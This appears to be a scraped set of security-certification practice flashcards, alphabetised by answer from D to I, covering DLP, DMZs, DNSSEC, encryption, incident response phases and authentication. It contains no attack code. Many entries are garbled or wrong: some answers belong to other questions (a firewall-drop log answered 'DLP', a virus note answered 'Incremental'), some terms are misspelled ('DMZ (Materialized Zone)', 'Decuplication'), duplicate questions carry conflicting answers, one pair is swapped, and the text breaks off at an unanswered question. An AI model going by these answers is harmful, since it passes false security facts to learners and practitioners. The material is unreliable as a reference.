Which of the following is an asymmetric function that generates a new and separate key every time it runs?

DHE

After a routine audit, a company discovers that engineering documents have been leaving the network on a particular port. The company must allow outbound traffic on this port, as it has a legitimate business use. Blocking the port would cause an outrage. Which of the following technology controls should the company implement?

DLP

Ann, a user, reports she is unable to access an application from her desktop. A security analyst verifies Ann's access and checks the SIEM for any errors. The security analyst reviews the log file from Ann's system and notices the following output: 2017--08-21 10:48:12 DROP TCP 172.20.89.232 239.255.255.255 443 1900 250 -------- RECEIVE 2017--08-21 10:48:12 DROP UDP 192.168.72.205 239.255.255.255 443 1900 250 -------- RECEIVE Which of the following is MOST likely preventing Ann from accessing the application from the desktop?

DLP

Scott works for a large bank that is trying to limit the risk associated with unapproved USB devices to company documents. Which is the best solution for this problem?

DLP (Data Loss Prevention)

A security administrator suspects that data on a server has been exhilarated as a result of unauthorized remote access. Which of the following would assist the administrator in con-firming the suspicion? (Select two)

DLP alerts Log analysis

Which of the following is the appropriate network structure used to protect servers and services that must be provided to external clients without completely eliminating access for internal users?

DMZ

Dawn is a network administrator where the company network is segmented into zones of high security, medium security, low security, and the DMZ. She's concerned about external intruders and would like to install a honeypot. Which is the most important zone to put the honeypot in?

DMZ (Demilitarized Zone)

Which of the following device concepts limit access to systems from outside users while protecting those inside the LAN?

DMZ (Demilitarized Zone)

Josh is designing a new network infrastructure that will allow unauthenticated users to connect from the Internet and access certain areas. The goal is to protect everything internal while still providing outside access. Josh decided to put the web server on a separate subnet that's open to public contact. What is this subnet called?

DMZ (Materialized Zone)

Choose the type of attack that is based on entering fake information into a target network domain name server?

DNS Poisoning

You've noticed that users on your network use a specific bank for personal banking. Some users have been the victim of a recent attack, where they visited a fake bank website and their logins were compromised. They had all visited the bank from your network and they insist they typed in the correct URL. What is most likely the explanation for this?

DNS Poisoning

A company wants to host a publicly available server that performs the following functions: evaluates MX record lookup; can perform authenticated requests for A and AAA records; uses RRSIG. Which of the following should the company use to fulfill the above requirements?

DNSSEC

Peter manages network security at a large company and is concerned about the variety of attacks, specifically DNS poisoning. Which of the following would be the best option to mitigate this issue?

DNSSEC

A forensic investigator has run into difficulty recovering usable files from a SAN drive. Which of the following SAN features might have caused the problem?

Decuplication

A forensic investigator has run into difficulty recovering unusable files from a SAN drive. Which of the following SAN features might have caused the problem?

Deduplication

Lonnie noticed that attackers have breached his WiFi network and have gained access via a wireless access point administrative panel and logged in with the credentials the WAP was shipped with. What best describes this issue?

Default Configuration

A home invasion occurred recently in which an intruder compromised a home network and accessed a WiFI- enabled baby monitor while the baby's parents were sleeping. Which of the following BEST describes how the intruder accessed the monitor?

Default configuration

A home invasion occurred recently in which an intruder compromised a home network and accessed a WiFi-enabled baby monitor while the baby's parents were sleeping. Which of the following BEST describes how the intruder accessed the monitor?

Default configuration

Which of the following is the BEST explanation of why control diversity is important in a defense-in-depth architecture?

Defense-in-depth relies on control diversity to provide multiple levels of network hierarchy that allow user domain segmentation

A system administrator is deploying a new mission essential server into a virtual environment. Which of the following is BEST mitigated by the environment's rapid elasticity characteristic?

Denial of service

A systems administrator is deploying a new mission essential server into a virtual environment. Which of the following is BEST mitigated by the environment's rapid elasticity characteristic?

Denial of service

A security analyst is reviewing the following packet capture of an attack directed at a company's server located in the DMZ: Which of the following ACLs provides the BEST protection against the above attack and any further attacks from the same IP, while minimizing service interruption?

Deny IP from 192.168.1.10/32 to 0.0.0.0/0

A user suspects someone has been accessing a home network without permission by spoofing the MAC address of an authorized system. While attempting to determine if an authorized user is logged into the home network, the user reviews the wireless router, which shows the following table for systems that are currently on the home network. Hostname: Unknown IP Address: 192.168.1.18 MAC: 10:B3:22:1A:FF:21 MAC filter: Off Which of the following should be the NEXT step to determine if there is an unauthorized user on the network?

Deny the "unknown" host because the hostname is not known and MAC filtering is not applied to this host

An organization uses SSO authentication for employee access to network resources. When an employee resigns, as per the organization's security policy, the employee's access to all network resources is terminated immediately. Two weeks later, the former employee sends an email to the help desk for a password reset to access payroll information from the human resources server. Which of the following represents the BEST course of action?

Deny the former employee's request, as a password reset would give the employee access to all network resources

A security engineer is configuring a wireless network with EAP-TLS. Which of the following activities is a requirement for this configuration?

Deploying certificates to endpoint devices

A high-security defense installation recently began utilizing large guard dogs that bark very loudly and excitedly at the slightest provocation. Which of the following types of controls does this BEST describe?

Deterrent

As the security administrator, you advise the web development team to include a CAPTCHA on a webpage where users are able to register for an account. Which control is this referring to?

Deterrent

Having adequate lighting on the outside of a building is an example of which of the following security controls?

Deterrent

Courtney manages data security on BYOD and COPE devices. She's specifically concerned about the data being exposed should a device be lost or stolen. Which item would the best to alleviate this concern?

Device Encryption

Alissa is worried about peripheral devices being exploited by an attacker. Which of the following is the best option for the first step in mitigating this threat?

Disable WiFi for any peripheral device that doesn't need it.

The SSID broadcast for a wireless router has been diabled but a network administrator notices that unauthorized users are accessing the wireless network. The administer has determined that attackers are still able to detect the presence of the wireless network despite the fact the SSID has been disabled. Which of the following would further obscure the presence of the wireless network?

Disable responses to a broadcast probe request

Given the log output: Which of the following should the network administrator do to protect data security?

Disable telnet and enable SSH

Security administrators attempted corrective action after a phishing attack. Users are still experiencing trouble logging in, as well as an increase in account lockouts. Users' email contacts are complaining of an increase in spam and social networking requests. Due to the large number of affected accounts, remediation must be accomplished quickly. Which of the following actions should be taken FIRST? (Select two)

Disable the open relay on the email server Enable sender policy framework

An organization has hired a penetration tester to test the security of its ten web servers. The penetration tester is able to gain root/administrative access in several servers by exploiting vulnerabilities associated with the implementation of SMTP, POP, DNS, FTP, Telnet, and IMAP. Which of the following recommendations should the penetration tester provide to the organization to better protect their web servers in the future?

Disable unnecessary services

A security administrator is diagnosing a server where the CPU utilization is at 100% for 24 hours. The main culprit of CPU utilization is the antivirus program. Which of the following issues could occur if left unresolved? (Select two)

DoS attack Resource exhaustion

A security administrator is diagnosing a server where the CPU utilization is at 100% for 24 hours. The main culprit of CPU utilization is the antivirus program. Which of the following issue could occur if left unresolved? (Select TWO)

DoS attack and Resource exhaustion

A security analyst notices anomalous activity coming from several workstations in the organizations. Upon identifying and containing the issue, which of the following should the security analyst do NEXT?

Document findings and processes in the after-action and lessons learned reports

You are a network security administrator for a bank and you have noticed that an attacker has exploited a flaw in OpenSSL and forced connections to move to a weak cipher which the attacker can breach. What type of attack is this?

Downgrade attack

Which of the following methods minimizes the system interaction when gathering information to conduct a vulnerability assessment of a router?

Download the configuration

You've noticed someone has been rummaging through your company's trash bins for documents, diagrams, and other sensitive information that has been thrown out. What is this known as?

Dumpster Diving

You've noticed that someone has been rummaging through the company's trash bins looking for documents, diagrams, and other sensitive information that's been thrown out. What is this called?

Dumpster Diving

In mobile devices, which of the following algorithms is typically used??

ECC (Elliptical Curve Cryptography)

Janet manages the security of the database servers at the mortgage company where she works. The servers are Windows Server 2016; she's concerned about file system security. Which Microsoft feature would be most helpful to implement security to the file systems?

EFS (Encrypting File System)

A security administrator is developing controls for creating audit trails and tracking if a PHI data breach is to occur. The administrator has been given the following requirements: All-Access must be correlated to a user account All user accounts must be assigned to a single individual User access to the PHI data must be recorded Anomalies in PHI data access must be reported Logs and records cannot be deleted or modified Which of the following should the administrator implement to meet the above requirements? (Select three)

Eliminate shared accounts Implement usage auditing and review Perform regular permission audits and reviews

As a security officer, you are concerned about data loss prevention (DLP). You have limited the use of USBs as well as all other portable media, you use an IDS to look for large volumes of outbound data, and a guard search all bags and people before they leave the building. What is a key step in the DLP that you have missed?

Email

Which of the following are considered among the BEST indicators that a received message is a hoax? (Select two)

Embedded URLs No valid digital signature from a known security organization

Which of the following components of printers and MFDs are MOST likely to be used as vectors of compromise if they are improperly configured?

Embedded web server

A business sector is highly competitive, and safeguarding trade secrets and critical information is paramount. On a seasonal basis, an organization employs temporary hires and contractor personnel to accomplish its mission objectives. The temporary and contract personnel require access to network resources only when on the clock. Which of the following account management practices are the BEST ways to manage these accounts?

Employ an account expiration strategy.

A business sector is highly competitive, and safeguarding trade secrets and critical information is paramount. On a seasonal basis, an organization employs temporary hires and contractor personnel to accomplish its mission objectives. The temporary and contract personnel require access to network resources only when on the clock. Which of the following account management practices are the BEST ways to manage these accounts?

Employ time-of-day restrictions

A security administrator has been tasked with improving the overall security posture related to desktop machines on the network. An auditor has recently that several machines with confidential customer information displayed in the screens are left unattended during the course of the day. Which of the following could the security administrator implement to reduce the risk associated with the finding?

Enable group policy based screensaver timeouts

Josh works for a company that has branch offices that connect back to the main office via a VPN. Josh recently noticed the key used on the VPN has been compromised. What should be done to ensure it isn't compromised in the future?

Enable perfect forward secrecy at the main office and branch office ends of the VPN.

Joe, a user wants to send Ann, another user, a confidential document electronically. Which of the following should Joe do to ensure the document is protected from eavesdropping?

Encrypt it with Ann's public key

Backup tapes are stored off-site. What should be done with them?

Encrypt the backup data

A company hires a third-party firm to conduct an assessment of vulnerabilities exposed to the Internet. The firm informs the company that an exploit exists for an FTP server that had a version installed from eight years ago. The company has to keep the system online anyways, as no upgrade exists from the vendor. Which of the following BEST describes the reason why the vulnerability exists?

End-of-life system

When systems, hardware, or software are not supported by the original vendor, it is a vulnerability known as:

End-of-life systems

A network administrator wants to ensure that users do not connect any unauthorized devices to the company network. Each desk needs to connect a VoIP phone and computer. Which of the following is the BEST way to accomplish this?

Enforce authentication for network devices

A security analyst is hardening a server with the directory services role installed. The analyst must ensure LDAP traffic cannot be monitored or sniffed and maintains compatibility with LDAP clients. Which of the following should the analyst implement to meet these requirements? (Select two)

Ensure port 636 is open between the clients and servers using the communication. Generate an X.509-compliant certificate that is signed by a trusted CA

Of the following options, what does application management accomplish for mobile devices?

Ensures only approved applications are installed on the devices

Ann, a security administrator, has been instructed to perform fuzz-based testing on the company's applications. Which of the following best describes what she will do?

Enter random or invalid data into the application in an attempt to cause it to fault

Upon entering an incorrect password, the logon screen displays a message informing the user that the password does not match the username provided and is not the required length of 12 characters. Which of the following secure coding techniques should a security analyst address with the application developers to follow security best practices?

Error handling

Upon entering an incorrect password, the logon screen displays a message informing the user that the password does not match the username provided and is not the required length of 12 characters. Which of the following secure coding techniques should a security analyst address with the application developers to follow security best practices?

Error handling

Which of the following penetration testing concepts is an attacker MOST interested in when placing the path of a malicious file in the Windows/CurrentVersion/Run registry key?

Escalation of privilege

Millie is responsible for testing security and uses a tool that identifies vulnerabilities and provides mechanisms to test them by trying to exploit them. What best describes this tool?

Exploit Framework

A company stores highly sensitive data files used by the accounting system on a server file share. The accounting system uses a service account named accounting-svc to access the file share. The data is protected will a full disk encryption, and the permissions are set as follows: File system permissions: Users = Read Only Share permission: accounting-svc = Read Only Given the listed protections are in place and unchanged, to which of the following risks is the data still subject?

Exploitation of local console access and removal of data

A company stores highly sensitive data files used by the accounting system on a server file share. The accounting system use a service account named accounting-svc to access the file share. The data is protected will a full disk encryption, and the permissions are set as follows: Given the listed protections are in place and unchanged, to which of following risks is the data still subject?

Exploitation of local console access and removal of data

Olivia manages wireless security in her company and wants completely different WiFi access (ie different SSID, different security levels, different authentication methods) in different parts of the company. What's the best choice for Olivia to select in WAPs?

FAT

Laura is currently working for a defense contracting company and is responsible for the security of their mobile devices. The company provides its employees company-issued tablets that may contain sensitive and even classified data. What would be the most important security measure to implement on the tablets to protect the sensitive information on them?

FDE

Steven is a network administrator for an insurance company. His company employs quite a few traveling salespeople. Steven is concerned about confidential data on their laptops. Which method is the best way to address this?

FDE ( Full Disk Encryption)

A security analyst has received the following alert snippet from the HIDS appliance: Given the above logs, which of the following is the cause of the attack?

FIN, URG, and PSH flags are set in the packet header

A security analyst has received the following alert snippet from the HIDS appliance: Pl=IU TO-C-OL STG SRC7='0RT O'ST.PO T TCP XMAS SCAN 192.168.1.1:1091 192.168.1.2:8891 TCP XMAS SCAN 192.168.1.1:649 192 .168.1.2:9001 TCP XMAS SCAN 192.168 .1.1:2264 192.168 .1.2:6455 TCP XMAS CAN 192.168.1.1:3464 192.168.1.2:8744 Given the above logs, which of the following is the cause of the attack?

FIN, URG, and PSH flags are set in the packet header.

One of your tasks is being responsible for authentication methods for your company. You've implemented fingerprint scanners in order to gain access to server rooms. People are frequently denied access to the server room even though they are authorized. What problem is presented here?

FRR (False Rate of Rejection)

Tanner has been given permission to run a vulnerability scan on the company's wireless network infrastructure. During the scan, he finds that ports 20 and 21 are open on most of the devices. What protocol is usually assigned to these ports?

FTP

Drag and drop the correct protocol to its default port.

FTP uses TCP port 21; Telnet uses port 23; SMTP uses port 25; SNMP uses TCP port 161; SCP uses port 22; TFTP uses port 69

A manager wants to distribute a report to several other managers within the company. Some of them reside in remote locations that are not connected to the domain but have a local server. Because there is sensitive data within the report and the size of the report is beyond the limit of the email attachment size, emailing the report is not an option. Which of the following protocols should be implemented to distribute the report securely?

FTPS HTTPS SSH

A security administrator wishes to implement a secure method of file transfer when communicating with outside organizations. Which of the following protocols would BEST facilitate secure file transfers? (Select TWO)

FTPS SCP

Ashley was asked to implement a secure protocol to use during file transfers that use digital certificates. What protocol would be the best option?

FTPS (File Transfer Protocol Secure)

A company is developing a new system that will unlock a computer automatically when an authorized user sits in front of it, and then lock the computer when the user leaves. The user does not have to perform any action for this process to occur. Which of the following technologies provides this capability?

Facial recognition

New magnetic locks were ordered for an entire building. In accordance with company policy, employee safety is a top priority. In case of a fire where electricity is cut, which of the following should be taken into consideration when installing the new locks?

Fail safe

Jack manages security devices in his network. He's implemented a robust NIDS in his network, however, on two occasions the NIDS has missed a breach. What condition does this describe?

False Negative

Andy is running an IDS on his network where sometimes users report that the IDS flags legitimate traffic as an attack. What situation describes this?

False Positivie

When using a NIDS or NIPS in your organization, what are your two biggest concerns?

False positives and false negatives

An organization is using a tool to perform a source code review. Which of the following describes the case in which the tool incorrectly identifies the vulnerability?

False-positive

An administrator is testing the collision resistance of different hashing algorithms. Which of the following is the strongest collision resistance test?

Find two identical messages with different bases

Which of the following would meet the requirements for multi factor authentication?

Fingerprint and password

When attempting to secure a mobile workstation, which of the following authentication technologies rely on the user's physical characteristics? (Select two)

Fingerprint scan Retina scan

For each of the given items, select the appropriate authentication category from the drop down choices. Select the appropriate authentication type for the following items:

Fingerprint scan = biometric authentication Hardware token = one time password Smart card = multi-factor Password = PAP authentication PIN number = PAP authentication Retina scan = Biometric authentication

Choose an example of PHI?

Fingerprints

An analyst receives an alert from the SIEM showing an IP address that does not belong to the assigned network can be seen sending packets to the wrong gateway. Which of the following network devices is misconfigured and which of the following should be done to remediate the issue?

Firewall; implement an ACL on the interface

Choose the scenario where using a shared account would pose the least security risk.

For guest Wi-Fi Access

A security analyst is doing a vulnerability assessment on a database server. A scanning tool returns the following information: There have been several security breaches on the web server that accesses this database. The security team is instructed to mitigate the impact of any possible breaches. The security team is also instructed to improve the security on this database by making it less vulnerable to offline attacks. Which of the following would BEST accomplish these goals? (Select two)

Force users to change passwords the next time they log on Start using salts to generate MD5 password hashes

Elizabeth is seeking a solution that will allow the network to retrieve information from various web resources in which all traffic passes through a proxy. What would be the best solution?

Forward Proxy

Joe, a backup administrator, wants to implement a solution that will reduce the restoration time of physical servers. Which of the following is the BEST method for Joe to use?

Full

The Chief Executive Officer (CEO) of a major defense contracting company a traveling overseas for a conference. The CEO will be taking a laptop. Which of the following should the security administrator implement to ensure confidentiality of the data if the laptop were if the laptop were to be stolen or lost during the trip?

Full device encryption

A security engineer wants to add SSL to the public web server. Which of the following would be the FIRST step to implement the SSL certificate?

Generate a CSR

You work for Macy's. The web server certificate has been revoked and you have some customers receiving errors when they connect to the website. What is the corrective action you must take?

Generate a new key pair and a new certificate

Margo works for a medium-sized company and is responsible for its cyber security. The company has a large number of salespeople who are required to travel for work. The company has been using ABAC for access control and recent there have been a number of logins being rejected incorrectly. What might be causing this issue?

Geographic Locations

An application team is performing a load-balancing test for a critical application during off-hours and has requested access to the load balancer to review which servers are up without having the administrator on call. The security analyst is hesitant to give the application team full access due to other critical applications running on call. The security analyst is hesitant to give the application team full access due to other critical applications running on the load balancer. Which of the following is the BEST solution for the security analyst to process the request?

Give the application team read-only access

Which of the following types of penetration test will allow the tester to have access only to password hashes prior to the penetration test?

Gray box

Which of the following types of penetration test will allow the tester to have access only to password hashes prior to the penetration test?

Gray box

You manage the account access control and authorization at your work, a large college. There are approximately 30,000 students and 1,200 faculty/staff that you manage accounts for. Which of the following is the best access control/account management approach?

Group-Based

Kim would like to implement a server authentication method that depends on TPM in a server. What's the best approach?

Hardware-Based Access Control

A company is terminating an employee for misbehavior. Which of the following is MOST important in the process of disengagement from this employee?

Have the employee surrender company identification

An organization requires users to provide their fingerprints to access an application. To improve security, the application developers intend to implement multifactor authentication. Which of the following should be implemented?

Have users sign their name naturally

An organization requires users to provide their fingerprints to access an application. To improve security, the application developers intend to implement multi factor authentication. Which of the following should be implemented?

Have users sign their name naturally

Deterrent

Having adequate lighting on the outside of a building is an example of which of the following security controls?

A malicious attacker has intercepted HTTP traffic and inserted an ASCII line that sets the referrer URL. Which of the following is the attacker most likely utilizing?

Header manipulation

Lance is the network administrator for a small college that has recently implemented a simple NIDS. However, the NIDS seems to catch only well-known attacks. What technology seems to be missing?

Heuristic scanning

Brandon is a network administrator and has received a popup window that tells him his files are now encrypted and he must pay a certain amount of bitcoins to get them decrypted. He tried to check the files in question, but their extensions have all changed and he cannot open them. What best explains the given scenario?

His machine has ransomware

Jamie recently downloaded a program from an unknown website and now his client files have had their file extensions changed and he cannot open them. He received a popup window that informed him that his files were now encrypted and he must pay some bitcoins to get them decrypted. What has happened?

His machine has ransomware

Every morning, a system administrator monitors failed login attempts on the company's log management server. The administrator notices the DBAdmin account has five failed username and/or password alerts during a ten-minute window. The systems administrator determines the user account is a dummy account used to attract attackers. Which of the following techniques should the system administrator implement?

Honeypot

Every morning, a systems administrator monitors failed login attempts on the company's log management server. The administrator notices the DBAdmin account has five failed username and/or password alerts during a ten-minute window. The systems administrator determines the user account is a dummy account used to attract attackers. Which of the following techniques should the systems administrator implement?

Honeypot

You have configured a nonproduction network to try to observe hacker techniques. This network is to be used as a target, so it can monitor network attacks. What type of network is this called?

Honeypot

A security administrator has been assigned to review the security posture of the standard corporate system image for virtual machines. The security administrator conducts a thorough review of the system logs, installation procedures, and network configuration of the VM image. Upon reviewing the access logs and user accounts, the security administrator determines that several accounts will not be used in production. Which of the following would correct the deficiencies?

Host hardening

Ann, a user, reports she is unable to access an application from her desktop. A security analyst verifies Ann's access and checks the SIEM for any errors. The security analyst reviews the log file from Ann's system and notices the following output: 2017--08-21 10:48:12 DROPTCP 172.20.89.232 239.255.255.255 443 1900 250 -------- RECEIVE 2017 --08-21 10:4812 DROP UDP 192.168.72.205 239.255.255.255 1900 250 -------- RECEIVE Which of the following is MOST likely preventing Ann from accessing the application from the desktop?

Host-based firewall

Joe, a technician, is working remotely with his company provided laptop at a coffee shop near his home. Joe is concerned that another patron of the coffee shop may be trying to access his laptop. Which of the following is an appropriate control to use to prevent other patrons from accessing Joe's laptop directly?

Host-based firewall

Which recovery site is the easiest to test?

Hot Site

Of the following examples, which is an example of a custodian security role?

Human Resources employee

Which of the following can affect electrostatic discharge in a network operations center?

Humidity controls

An auditor is reviewing the following output from a password-cracking tool: Which of the following methods did the auditor MOST likely use?

Hybrid

While reviewing the monthly internet usage it is noted that there is a large spike in traffic classified as "unknown" and does not appear to be within the bounds of the organizations' Acceptable Use Policy. Which of the following tool or technology would work BEST for obtaining more information on this traffic?

IDS logs

Jody is worried about disgruntled employees stealing company documents and exfiltrating them from the network. She's seeking a solution that will detect exfiltration and block it. What type of system is Jody seeking?

IPS (Intrusion Prevention System)

A security analyst is investigating a suspected security breach and discovers the following in the logs of the potentially compromised server: (multiple logins failed) Which of the following would be the BEST method for preventing this type of suspected attack in the future?

Implement account lockout settings

You have partnered with another company that requires some systems to be shared. Which agreement outlines how they should be interfaced?

ISA

You have been tasked with finding a standard for your company in order to implement consistent information security management systems. You're looking for a standard that is international. Which of the following is the best option?

ISO 27002

Your wireless network has been breached and it seems as though the attacker has modified a portion of your data that is used with a stream cipher. This was used to expose wirelessly-encrypted data. What type of attack is this?

IV Attack

A company is evaluating cloud providers to reduce the cost of its internal IT operations. The company's aging systems are unable to keep up with customer demand. Which of the following cloud models will the commpany most liekely select?

IaaS

A company is evaluating cloud providers to reduce the cost of its internal IT operations. The company's aging systems are unable to keep up with customer demand. Which of the following cloud models will the company MOST likely select?

IaaS

After an identified security breach, an analyst is tasked to initiate the IR process. Which of the following is the NEXT step the analyst should take?

Identification

An incident response manager has started to gather all other facts related to a SIEM alert showing multiple systems may have been compromised. The manager has gathered these facts: In which of the following phases of the IRP is the manager currently working?

Identification

An incident response manager has started to gather all the facts related to a SIEM alert showing multiple systems may have been compromised. The manager has gathered these facts: The breach is currently indicated on six user PCs One service account is potentially compromised Executive management has been notified In which of the following phases of the IRP is the manager currently working?

Identification

Kevin, the helpdesk manager, calls stating that there has been an increase in calls from users who are stating that their computers are infected with malware. Which of the following steps should be taken first?

Identification

Which of the following is the proper order for logging a user into a system from the first step to the last step?

Identification, authentication, authorization

A computer emergency response team is called at midnight to investigate a case in which a mail server was restarted. After an initial investigation, it was discovered that email is being exfiltrated through an active connection. Which of the following is the NEXT step the team should take?

Identify the source of the active connection

A computer emergency response team is called at midnight to investigate a case in which a mail server was restarted. After an initial investigation, it was discovered that email is being exfiltrated through an active connection. Which of the following is the NEXT step the team should take?

Identify the source of the active connection

Which of the following is commonly done as part of a vulnerability scan?

Identifying unpatched workstations

Which of the following is commonly done as part of the vulnerability scan?

Identifying unpatched workstations

An attacker wearing a building maintenance uniform approached a company's receptionist asking for access to a secure area. The receptionist asks for identification, a building access badge and checks the company's list approved maintenance personnel prior to granting physical access to the secure area. The controls used by the receptionist are in place to prevent which of the following types of attacks?

Impersonation

A company is deploying a file-sharing protocol access a network and needs to select a protocol for authenticating clients. Management requests that the service be configured in the most secure way possible. The protocol must also be capable of mutual authentication, and support SSO and smart card logons. Which of the following would BEST accomplish this task?

Implement Kerberos

A company offers SaaS, maintaining all customers' credentials and authenticating locally. Many large customers have requested some form of federation with their existing authentication infrastructures. Which of the following would allow customers to manage authentication and authorizations from within their existing organizations?

Implement SAML so the company's services may accept assertions from the customer's authentication servers

A company offers Saas, maintaining all customers' credentials and authenticating locally. Many large customers have requested the company offer some form of federation with their existing authentication infrastructures. Which of the following would allow customers to manage authentication and authorizations from within their existing organizations?

Implement SAML so the company's services may accept assertions from the customers' authentication servers.

A security analyst wants to harden the company's VoIP PBX. The analyst is worried that credentials may be intercepted and comprised when the BPX. Which of the following would best prevent this from occurring?

Implement SRTP between the phones and the PBX

An organization finds that most help desk calls are regarding account lockout due to a variety of applications running on different systems. Management is looking for a solution to reduce the number of account lockouts while improving security. Which of the following is the BEST solution for this organization?

Implement SSO

A security administrator is performing a risk assessment on a legacy WAP with a WEP-enabled wireless infrastructure. Which of the following should be implemented to harden the infrastructure without upgrading the WAP?

Implement WPA2 Enterprise

The security administrator receives an email on a non-company account from a coworker stating that some reports are not exporting correctly. Attached to the email was an example report file with several customers' names and credit card numbers with the PIN. Which of the following is the BEST technical controls that will help mitigate this risk of disclosing sensitive data?

Implement a DLP solution on the email gateway to scan email and remove sensitive data or files

Cassie is worried about credential management on a network where users often have over six passwords to remember. She's currently interested in finding a solution to this problem. Which would be the best way to address this issue?

Implement a manager

Mark noticed that one of the employees at his company tethers to his smartphone to bypass corporate web security to access prohibited websites while still being connected to the LAN. What is the best way to prevent this?

Implement a policy against tethering

You currently have web developers in your company who have direct access to production servers and can deploy code to it. These actions can lead to insecure code and code flaws being deployed to directly into the live environment. Currently, your company only has one server available (the production server). What is the best change that can be made to mitigate this risk?

Implement a staging server

A security administrator learns that Pll, which was gathered by the organization, has been found in an open forum. As a result, several C-level executives found their identities were compromised, and they were victims of a recent whaling attack. Which of the following would prevent these problems in the future? (Select TWO)

Implement an email DLP Implement a spam filter

A security administrator learns that PII, which was gathered by the organization, has been found in an open forum. As a result, several C-levelexecutives found their identities were compromised, and they were victims of a recent whaling attack. Which of the following would prevent these problems in the future? (Select TWO).

Implement an email OLP. Implement a spam filter.

As part of a new BYOD rollout, a security analyst has been asked to find a way to securely store company data on personal devices. Which of the following would BEST help to accomplish this?

Implement containerization of company data

The data backup window has expanded into the morning hours and has begun to affect production users. The main bottleneck in the process is the time it takes to replicate the backups to separate servers at the offsite data center. Which of the following uses of deduplication could be implemented to reduce the backup window?

Implement deduplication on the storage array to reduce the amount of drive space needed.

Cierra is the CISO for her company. She's working to mitigate the danger of computer viruses in her network. Which administrative control can be implemented to assist with this goal?

Implement policies regarding email attachments and file downloads

An application was recently compromised after some malformed data came in via web form. Which of the following would MOST likely have prevented this?

Input validation

An administrator thinks the UNIX systems may be compromised, but a review of system log files provides no useful information. After discussing the situation with the security team, the administrator suspects that the attacker may be altering the log files and removing evidence of intrusion activity. Which of the following actions will help detect attacker attempts to further alter log files?

Implement remote syslog

A security ana!yst is securing smartphones and laptops for a highly mobile workforce. Priorities include: Remote wipe capabilities Geolocation services Patch management and reporting Mandatory screen locks Ability te require passcodes and pins Ability to require encryption Which of the following would BEST meet these requirements?

Implementing MDM software

A security analyst is securing smartphones and laptops for a highly mobile workforce. Priorities include: Which of the following would BEST meet these requirements?

Implementing MDM software

Jason manages password management for his company. Sometimes users cannot remember their passwords. What is the best option for Jason to address this?

Implementing password recovery

After a security assessment was performed on the enterprise network, it was discovered that: Which of the following BEST describes the vulnerabilities that exist in this environment? (Select two)

Improperly configured accounts Poorly trained users

Which of the following best describes routine in which semicolons, dashes, quotes, and commas are removed from a string?

Input validation to protect against SQL injection

Which of the following would MOST likely appear in an uncredentialed vulnerability scan?

Inactive local accounts

Technicians working with servers hosted at the company's datacenter are increasingly complaining of electric shocks when touching metal items have been linked to hard drive failures. Which of the following should be implemented to correct this issue?

Increase humidity in the room

An organization's file server has been virtualized to reduce costs. Which of the following types of backups would be MOST appropriate for the particular file server?

Incremental

Polymorphic viruses change. This is not a hoax, this is a legitimate virus. Boot sector viruses affect the hard drive, and stealth viruses include a number of different types of viruses.

Incremental

When it comes to cloud computing, if one of the requirements for a project is to have the most control over the systems in the cloud, which of the following is a service model that would be BEST suited for this goal?

Infrastructure

When it comes to cloud computing, if one of the requirements for a project is to have the most control over the systems in the cloud, which of the following is a service model that would be BEST suited for this goal?

Infrastructure

A corporation is concerned that, if a mobile device is lost, any information on the device could be accessed by third parties. Which of the following would BEST prevent this from happening?

Initiate remote wiping on lost mobile devices

A security analyst accesses corporate web pages and inputs random data in the forms. The response received includes the type of database used and SQL commands that the database accepts. Which of the following should the security analyst use to prevent this vulnerability?

Input validation

An application was recently compromised after some malformed data came in via web form. Which of the following would MOST likely have prevented this?

Input validation

Several workstations on a network are found to be on OS versions that are vulnerable to a specific attack. Which of the following is considered to be a corrective action to combat this vulnerability?

Install a vendor-supplied patch

Jay is a security administrator for a large company and has about 100 hosts on his network that were recently attacked by a virus. He's concerned because there was a patch available that would have minimized the impact from the virus. What is the best solution to implement on the network?

Install patch management software

Rachel manages security for a small bank and has a firewall at the gateway as well as one at each network segment. Each firewall logs all accepted and rejected traffic. Rachel checks each of these logs regularly. What's the first step that should be taken to improve this firewall configuration?

Integrate with SIEM (Security Information and Event Management)

The firewall administrator is adding a new certificate for the company's remote access solution. The solution requires that the uploaded file contains the entire certificate chain for the certificate to load properly. The administrator loads the company certificate and root CA certificate into the file. The file upload is rejected. Which of the following is required to complete chain?

Intermediate authority

Laura is the security administrator for a bank and is interested in detecting breaches and attempted breaches of the network, including internal breaches. She doesn't want false positives to disrupt productivity. Which of the following devices is the best choice?

Intrusion Detection System

A new security administrator ran a vulnerability scanner for the first time and caused a system outage. Which of the following types of scans MOST likely caused the outage?

Intrusive non-credentialed scan

A new security administrator ran a vulnerability scanner for the first time and caused a system outage. Which of the following types of scans MOST likely caused the outage?

Intrusive non-credentialed scan

A botnet has hit a popular website with a massive number of GRE-encapsulated packets to perform a DDoS attack. News outlets discover a certain type of refrigerator was exploited and used to send outbound packets to the website that crashed. To which of the following categories does the refrigerator belong?

IoT

A security administrator suspects a MITM attack aimed at impersonating the default gateway is underway. Which of the following tools should the administrator use to detect this attack? (Select two)

Ipconfig Tracert

Of the following principles, which one can be used for a means of two-factor authentication?

Iris Scan and password

Which of the following precautions MINIMIZES the risk from network attacks directed at multifunction printers, as well as the impact on functionality at the same time?

Isolating the systems using VLANs

Why might it not be advisable to conduct penetration tests on your corporate network?

It can be disruptive for the business activites

Several users are complaining they cannot connect to the wireless network and you discover that the WAPs are being subjected to a wireless attack that is designed to block their WiFi signals. Which is the best label for this attack?

Jamming

Corporations choose to exceed regulatory framework standards because of which of the following incentives?

It improves the legal defensibility of the company

Amy found netcat installed on an employee's computer, but the employee isn't authorized to have netcat. What security concern is presented by this utility?

It is a network communication utility

Caleb is the network administrator where users are reporting odd behavior on their computers. He believes this may be due to malware but the behavior is different on different computers. What could best explain this anomaly?

It is a polymorphic virus

Nicole is working to implement a virtual IP load-balancing option and thinks this might alleviate network slowdowns and mitigate some of the impacts from a DoS attack. What is the drawback of virtual IP load-balancing?

It is connection-based, not loaded

An organization wants to upgrade its enterprise-wide desktop computer solution. The organization currently has 500 Pcs active on the network. The Chief Information Security Officer (CISO) suggests that the organization employ desktop imaging technology for such a large scale upgrade. Which of the following is a security benefit of implementing an imaging solution?

It provides a consistent baseline

Of the following, which is the most important benefit from implementing SDN (Software Defined Network)?

It provides scalability

Which of the following BEST explains why sandboxing is a best practice for testing software from an untrusted vendor prior to an enterprise deployment?

It restricts the access of the software to a contained logical space and limits possible damage

A security administrator is evaluating three different services: radius, diameter, and Kerberos. Which of the following is a feature that is UNIQUE to Kerberos?

It uses tickets to identify authenticated users

A systems administrator found a suspicious file in the root of the file system. The file contains URLs, usernames, passwords, and text from other documents being edited on the system. Which of the following types of malware would generate such a file?

